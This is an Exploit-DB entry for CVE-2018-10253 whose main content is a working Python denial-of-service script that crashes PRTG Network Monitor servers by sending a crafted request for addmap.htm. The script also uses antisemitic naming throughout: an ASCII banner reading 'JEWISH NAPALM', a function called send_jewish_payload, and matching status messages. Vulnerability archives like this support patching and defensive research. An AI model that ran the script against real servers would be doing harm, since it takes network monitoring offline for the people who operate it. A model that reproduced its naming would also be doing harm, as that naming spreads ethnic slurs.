PRTG Network Monitor < 18.1.39.1648 - Stack Overflow (Denial of Service)

EDB-ID: 44500
Author: luriel
Published: 2018-04-23
CVE: CVE-2018-10253
Type: Dos
Platform: Windows_x86
Vulnerable App: N/A 

 # Date: 2018-04-21 
 # Exploit Author: Lucas "luriel" Carmo 
 # Vendor Homepage: https://www.paessler.com/prtg 
 # Software Link: https://www.paessler.com/download/prtg-download 
 # Version: 18.1.39.1648 
 # CVE : CVE-2018-10253 
 # Post Reference: https://medium.com/stolabs/stack-overflow-jewish-napalm-on-prtg-network-monitoring-56609b0804c5 
 # http://www.roothc.com.br/stack-overflow-prtg-network-monitoring-jewish-napalm/ 
  
 #!/usr/bin/python 
  
 import requests 
 import sys 
 import os 
 import re 
 import socket 
  
 green = "\033[1;32m" 
 yellow = '\033[1;33m' 
 normal = '\033[0;0m' 
 banner = """ 
      ██╗███████╗██╗    ██╗██╗███████╗██╗  ██╗    ███╗   ██╗ █████╗ ██████╗  █████╗ ██╗     ███╗   ███╗ 
      ██║██╔════╝██║    ██║██║██╔════╝██║  ██║    ████╗  ██║██╔══██╗██╔══██╗██╔══██╗██║     ████╗ ████║ 
      ██║█████╗  ██║ █╗ ██║██║███████╗███████║    ██╔██╗ ██║███████║██████╔╝███████║██║     ██╔████╔██║ 
 ██   ██║██╔══╝  ██║███╗██║██║╚════██║██╔══██║    ██║╚██╗██║██╔══██║██╔═══╝ ██╔══██║██║     ██║╚██╔╝██║ 
 ╚█████╔╝███████╗╚███╔███╔╝██║███████║██║  ██║    ██║ ╚████║██║  ██║██║     ██║  ██║███████╗██║ ╚═╝ ██║ 
  ╚════╝ ╚══════╝ ╚══╝╚══╝ ╚═╝╚══════╝╚═╝  ╚═╝    ╚═╝  ╚═══╝╚═╝  ╚═╝╚═╝     ╚═╝  ╚═╝╚══════╝╚═╝     ╚═╝ 
 """ 
  
  
 banner2 = """ 
                                             Author: @Lucas "luriel" Carmo 
 """ 
  
 os.system('clear') 
  
 print(green+banner) 
 print(yellow+banner2) 
 print(normal) 
  
 def check_http(url): 
     pattern = re.compile("http://") 
     return re.search(pattern, url) 
  
 def sanitize_url(url): 
     if(not check_http(url)): 
         return "http://" + url 
     return url 
  
 def check_server(url): 
     r = requests.get(url, timeout=4) 
     code = r.status_code 
  
 def send_jewish_payload(url): 
     payload = {'file':'addmap.htm'} 
     r = requests.post(url, params=payload) 
  
 def main(): 
     try: 
         if len(sys.argv) <= 3 and len (sys.argv) >= 2: 
             try: 
                 url = sanitize_url(sys.argv[1]) 
                 print(' [#] LOADING!') 
                 if (check_server(url) != 404): 
                     send_jewish_payload(url) 
                 else: 
                     print(' [!] Server shutdown or not found') 
             except requests.exceptions.ConnectionError: 
                 print(' [~] BOOOOOM! PRTG Server has been exploded!') 
             except requests.exceptions.InvalidURL: 
                 print(' [!] Invalid URL') 
             except requests.exceptions.Timeout: 
                 print(' [!] Connection Timeout\n') 
         else: 
             print('Example usage: ./'+sys.argv[0]+' http://192.168.0.10/index.htm') 
     except KeyboardInterrupt: 
         print(' [!] Jewish Napalm Canceled;.....[./]') 
 if __name__ == '__main__': 
     main()

Source: www.exploit-db.com
Related Posts